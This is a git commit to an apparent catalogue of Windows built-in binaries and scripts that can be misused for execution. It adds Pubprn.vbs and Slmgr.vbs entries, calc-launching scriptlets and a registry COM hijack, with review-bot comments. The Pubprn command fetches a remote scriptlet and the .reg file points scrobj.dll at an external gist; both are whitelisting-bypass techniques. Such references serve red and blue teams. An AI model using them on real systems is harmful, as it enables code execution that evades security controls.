Added more in new structure

master
api0cradle 2018-04-18 16:59:53 +02:00
parent e4b37b00ef
commit 0eb4ec64e3
10 changed files with 202 additions and 0 deletions

Contribute.md Normal file

@ -0,0 +1,29 @@
Template
## Binary.exe
* Functions: Execute
```
Example
```
Acknowledgements:
* Name of guy - @twitterhandle
Code sample:
* [NameOfLink](Payload/NameOfPayload)
Resources:
* https://linktosomethingusefull.com
Full path:
```
c:\windows\system32\binary.exe
```
Notes:
Some specific details about the binary file.
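Review bot: `Template` at the top of Contribute.md is plain text while the entry below it uses `## Binary.exe`; make it a heading (for example `# Template`) so the file renders as a titled section rather than a stray word. Two smaller points in the same hunk: the placeholder resource URL reads `linktosomethingusefull.com` (should be `useful`), and the sample full path is lower-case `c:\windows\system32\binary.exe` while the new entries in this commit mix `C:\Windows\...` and `c:\windows\...`; settle on one casing in the template so contributors copy a consistent form.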


@ -15,6 +15,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Installutil.exe](OSBinaries/Installutil.md) [Installutil.exe](OSBinaries/Installutil.md)
[Mavinject32.exe](OSBinaries/Mavinject32.md) [Mavinject32.exe](OSBinaries/Mavinject32.md)
[Msbuild.exe](OSBinaries/Msbuild.md) [Msbuild.exe](OSBinaries/Msbuild.md)
[Msdt.exe](OSBinaries/Msdt.md)
[Mshta.exe](OSBinaries/Mshta.md) [Mshta.exe](OSBinaries/Mshta.md)
[Msiexec.exe](OSBinaries/Msiexec.md) [Msiexec.exe](OSBinaries/Msiexec.md)
[Odbcconf.exe](OSBinaries/Odbcconf.md) [Odbcconf.exe](OSBinaries/Odbcconf.md)


@ -5,3 +5,4 @@ If you are missing from the acknowledgement, please let me know (I did not forge
# OS SCRIPTS # OS SCRIPTS
[Cl_invocation](OSScripts/Cl_invocation.md)
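Review bot: only `Cl_invocation` is added to the OS Scripts index, yet this commit also creates `OSScripts/Pubprn.md` and `OSScripts/Slmgr.md`; add `[Pubprn](OSScripts/Pubprn.md)` and `[Slmgr](OSScripts/Slmgr.md)` here, otherwise the two new entries are unreachable from the list.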

OSBinaries/Msdt.md Normal file

@ -0,0 +1,15 @@
## Msdt.exe
* Functions: Execute
```
Open .diagcab package
```
Acknowledgements:
* ?
Resources:
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
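Review bot: the Msdt.exe entry omits the `Code sample:`, `Full path:` and `Notes:` sections that the Contribute.md template in this commit defines, and the acknowledgement is a `?` placeholder; add at least the full path, and either credit the source (the two linked write-ups name their authors) or state that the origin is unknown. The fenced block also contains a description (`Open .diagcab package`) rather than an invocation like the other entries; mark it as a description so readers do not take it for a command line.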


@ -0,0 +1,29 @@
## CL_Invocation.ps1
* Functions: Execute
```
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
SyncInvoke <executable> [args]
```
Acknowledgements:
* Jimmy - @bohops
Code sample:
Resources:
* https://twitter.com/bohops/status/948548812561436672
Full path:
```
C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
```
Notes:
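Review bot: `Code sample:` and `Notes:` are left as empty headings; either drop them or fill them in. Notes is the right place to state what `SyncInvoke` is (per the example, a function exposed once `CL_Invocation.ps1` is dot-sourced) and that the script ships under `C:\Windows\diagnostics\system\AERO\`, which is the path a defender would audit or monitor for unexpected invocation.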

OSScripts/Pubprn.md Normal file

@ -0,0 +1,29 @@
## Pubprn.vbs
* Functions: Execute
```
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
```
Acknowledgements:
* Matt Nelson - @enigma0x3
Code sample:
* [Pubprn_calc.sct](Payload/Pubprn_calc.sct)
Resources:
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
Full path:
```
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
```
Notes:
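Review bot: the code-sample link `[Pubprn_calc.sct](Payload/Pubprn_calc.sct)` is relative to `OSScripts/Pubprn.md`, so it resolves to `OSScripts/Payload/Pubprn_calc.sct`, but the file is added at the repository root as `Payload/Pubprn_calc.sct`; use `../Payload/Pubprn_calc.sct`. `Notes:` is an empty heading; either remove it or use it to point out that the example loads a scriptlet from a remote `script:` URL, which is the behaviour a defender would look for in `pubprn.vbs` command lines.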

OSScripts/Slmgr.md Normal file

@ -0,0 +1,30 @@
## Slmgr.vbs
* Functions: Execute
```
slmgr.vbs
```
Acknowledgements:
* Matt Nelson - @enigma0x3
* Casey Smith - @subtee
Code sample:
* [NameOfLink](Payload/NameOfPayload)
Resources:
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://www.youtube.com/watch?v=3gz1QmiMhss
Full path:
```
c:\windows\system32\slmgr.vbs
c:\windows\sysWOW64\slmgr.vbs
```
Notes:
Requires registry keys to work.
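Review bot: `Code sample:` still carries the template placeholder `[NameOfLink](Payload/NameOfPayload)` even though this commit adds `Payload/Slmgr.reg` and `Payload/Slmgr_calc.sct`; link both (from `OSScripts/` the relative path is `../Payload/...`). `Requires registry keys to work` should also name them: the `.reg` file registers a `Scripting.Dictionary` CLSID under `HKEY_CURRENT_USER\Software\Classes` with `scrobj.dll` as `InprocServer32` and a `ScriptletURL` value, which is exactly the artifact a defender can alert on, so it belongs in the Notes rather than only in the payload file.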

Payload/Pubprn_calc.sct Normal file

@ -0,0 +1,22 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
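Review bot: `<?XML version="1.0"?>` is not a well-formed XML declaration (the keyword must be lower-case `xml`); the Windows scriptlet host is lenient, but any repository tooling that validates `.sct` samples with a standard XML parser will reject the file. Use `<?xml version="1.0"?>`.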

Payload/Slmgr.reg Normal file

@ -0,0 +1,24 @@
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://gist.githubusercontent.com/enigma0x3/4373e9a63aaebe177c747af9bc6da743/raw/2207d8a1a536371aff5f61c8bef8400622868976/wee.png"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="Scripting.Dictionary"
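Review bot: `ScriptletURL` points at an external gist (`.../raw/.../wee.png` under enigma0x3's account) instead of the `Payload/Slmgr_calc.sct` added in this same commit, so the sample depends on third-party hosted content that can change or disappear, and the committed `.sct` is never actually referenced. Point the value at the local payload (or a clearly labelled placeholder) and say so in `Slmgr.md`.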

Payload/Slmgr_calc.sct Normal file

@ -0,0 +1,22 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
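Review bot: the `classid` here is `{AAAA1111-0000-0000-0000-0000FEEDACDC}` (the same value `Pubprn_calc.sct` uses) while `Slmgr.reg` registers `{00000001-0000-0000-0000-0000FEEDACDC}`; the `<registration>` classid only matters when the scriptlet is registered through it, but the mismatch invites confusion, so either align the two or state in `Slmgr.md` that the CLSID in the `.reg` file is the one that applies. The `<?XML` declaration should also be lower-case `<?xml` to be well-formed.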